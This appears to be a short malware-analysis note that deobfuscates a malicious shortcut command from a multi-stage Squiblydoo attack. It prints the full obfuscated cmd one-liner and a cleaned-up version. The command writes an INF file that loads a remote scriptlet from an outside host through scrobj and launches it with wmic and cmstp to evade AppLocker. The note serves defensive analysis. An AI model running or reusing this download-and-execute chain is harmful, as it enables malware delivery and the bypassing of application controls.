Attack - RCE Multi-stage Squiblydoo variant

[toc]

---

Multi-stage Squiblydoo variant

---

step 1

the .lnk file has a cmd command but it looks encoded/obfuscated.

• the cmd contains two distinct sections.
• The first part creates a “RANDOM.inf” file
  • (RANDOM is a random number generated via %random% command)
• the second part starts it using WMI and cmstp
  • cmstp is often used to bypass Applocker

original

“C:\Windows\System32\cmd.exe” /v /c set “EhWLDvbm34801=Items”
&& call set “EhWLDvbm4162=%EhWLDvbm34801:~4,1%”
&& (for %e in (c) do @set “EhWLDvbm4796=%~e”)
&& !EhWLDvbm4162!et “EhWLDvbm8561=na”
&& !EhWLDvbm4162!et “EhWLDvbm85714=a”
&& !EhWLDvbm4162!et “EhWLDvbm13835=t”
&& !EhWLDvbm4162!et “EhWLDvbm9306=d”
&& call !EhWLDvbm4162!et “EhWLDvbm1449=%ran!EhWLDvbm9306!om%.inf”
&& call !EhWLDvbm4162!et “EhWLDvbm9442=%app!EhWLDvbm9306!ata%\Micro!EhWLDvbm4162!oft\!EhWLDvbm1449!”
&& !EhWLDvbm4162!et “EhWLDvbm59779=.”
&& !EhWLDvbm4162!et “EhWLDvbm19532=“^”
&& (for %r in (“[ver!EhWLDvbm4162!ion]” “!EhWLDvbm4162!ig!EhWLDvbm8561!ture=$Window!EhWLDvbm4162! NT$” “[!EhWLDvbm9306!e!EhWLDvbm4162!tinationdirs]” “2A436=01” “[!EhWLDvbm9306!efaultin!EhWLDvbm4162!tall_singleu!EhWLDvbm4162!er]” “UnRegis!EhWLDvbm13835!erOCXs=47E0” “!EhWLDvbm9306!elfiles=2A436" “[47E0]” “%11%\%EhWLDvbm55506%crO%EhWLDvbm59234%j,NI,%EhWLDvbm69079%%EhWLDvbm23745%%EhWLDvbm23745%p%EhWLDvbm23092%%EhWLDvbm20494%%EhWLDvbm20494%web2!EhWLDvbm59779!e-fax!EhWLDvbm59779!%EhWLDvbm2079%/gmaps!EhWLDvbm59779!txt” “[2A436]” “!EhWLDvbm1449!” “[!EhWLDvbm4162!!EhWLDvbm13835!rings]” “EhWLDvbm23745=t” “EhWLDvbm69079=h” “EhWLDvbm23092=:” “EhWLDvbm55506=s” “EhWLDvbm20494=/” “EhWLDvbm59234=b” “EhWLDvbm2079=org” “!EhWLDvbm4162!ervicen!EhWLDvbm85714!me=' ‘” “!EhWLDvbm4162!hortsvcn!EhWLDvbm85714!me=’ ’“) do @e!EhWLDvbm4796!ho %~r)>“!EhWLDvbm9442!
“&& !EhWLDvbm4162!t!EhWLDvbm85714!rt “” /MIN wmi!EhWLDvbm4796! proce!EhWLDvbm4162!s call !EhWLDvbm4796!rea!EhWLDvbm13835!e “cm!EhWLDvbm4162!!EhWLDvbm13835!p /ns /!EhWLDvbm4162! /su !EhWLDvbm9442!”

---

chop

• && runs the second command on the line when the first command comes back successfully
• %variablename% a inbuilt or user set environmental variable
• !variablename! a user set environmental variable expanded at execution time, turned with SetLocal EnableDelayedExpansion command

%Items:~4,1%=s

%~e=c


smtp:
Syntax 1 - This is the typical syntax used in a custom installation application. To use this syntax, you must run cmstp from the directory that contains the <serviceprofilefilename>.exe file.

<serviceprofilefilename>.exe /q:a /c:cmstp.exe <serviceprofilefilename>.inf [/nf] [/s] [/u]

Syntax 2
cmstp.exe [/nf] [/s] [/u] [drive:][path]serviceprofilefilename.inf

“C:\Windows\System32\cmd.exe” /v /c set “Items=Items”
&& call set “EhWLDvbm4162=%Items:~4,1%=s”
&& (for %e in (c) do @set “EhWLDvbm4796=%~e=c”)
&& set “EhWLDvbm8561=na”
&& set “EhWLDvbm85714=a”
&& set “EhWLDvbm13835=t”
&& set “EhWLDvbm9306=d”
&& call set “EhWLDvbm1449=%random%.inf”
&& call set “EhWLDvbm9442=%appdata%\Microsoft\%random%.inf”
&& set “EhWLDvbm59779=.”
&& set “EhWLDvbm19532=“^”
&& (for %r in (
    “[version]”
    “signature=$Windows NT$”
    “[destinationdirs]”
    “2A436=01”
    “[defaultinstall_singleuser]”
    “UnRegisterOCXs=47E0”
    “delfiles=2A436"
    “[“UnRegisterOCXs]”
    “%11%\scrObj,NI,https://web2.e-fax.org/gmaps.txt”
    “[“delfiles]”
    “%random%.inf”
    “[strings]”
    “EhWLDvbm23745=t”
    “EhWLDvbm69079=h”
    “EhWLDvbm23092=:”
    “EhWLDvbm55506=s”
    “EhWLDvbm20494=/”
    “EhWLDvbm59234=b”
    “EhWLDvbm2079=org”
    “servicename=' ‘”
    “shortsvcname=’ ’“
    ) do @echo %~r)>“%appdata%\Microsoft\%random%.inf“
&& start “” /MIN wmic process call create “cmstp /ns /s /su %appdata%\Microsoft\%random%.inf”

---

ref

• Analysis of a Multi-stage Squiblydoo variant

.